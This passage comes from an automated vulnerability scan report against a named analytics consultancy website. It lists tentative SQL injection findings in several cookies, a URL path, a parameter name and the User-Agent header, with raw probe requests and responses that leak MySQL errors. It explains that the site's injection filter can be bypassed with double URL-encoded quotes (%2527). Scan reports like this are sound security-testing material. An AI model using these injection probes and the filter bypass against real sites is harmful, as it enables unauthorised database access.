Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:04:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:04:42 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:04:42 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30094


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.11. http://www.analyticspros.com/blog/55-googleanalytics.html [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics.html

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utma cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/55-googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:22:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/55-googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:22:16 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.12. http://www.analyticspros.com/blog/55-googleanalytics.html [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/55-googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141'; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:23:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/55-googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141''; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:23:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:23:41 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:23:41 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28572


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.13. http://www.analyticspros.com/blog/55-googleanalytics/ [apros2.0_tpl cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the apros2.0_tpl cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:14:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:14:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.14. http://www.analyticspros.com/blog/55-googleanalytics/ [ki_u cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/

Issue detail

The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:17:41 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:17:41 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:17:43 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 04:17:43 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28432


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.15. http://www.analyticspros.com/blog/55-googleanalytics/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/?1%2527=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:21:44 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/?1%2527%2527=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:21:44 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:21:48 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 04:21:48 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28549


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.16. http://www.analyticspros.com/blog/55-googleanalytics/ [optimizelyBuckets cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/

Issue detail

The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D'; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:18:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D''; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:18:30 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:18:32 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 04:18:32 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28432


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.17. http://www.analyticspros.com/blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog%2527/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 404 Component not found
Date: Sat, 06 Nov 2010 06:51:03 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 06 Nov 2010 06:51:06 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 3015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<title>404 - Error: 404</title>
...[SNIP]...

Request 2

GET /blog%2527%2527/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:51:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.18. http://www.analyticspros.com/blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)%2527
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
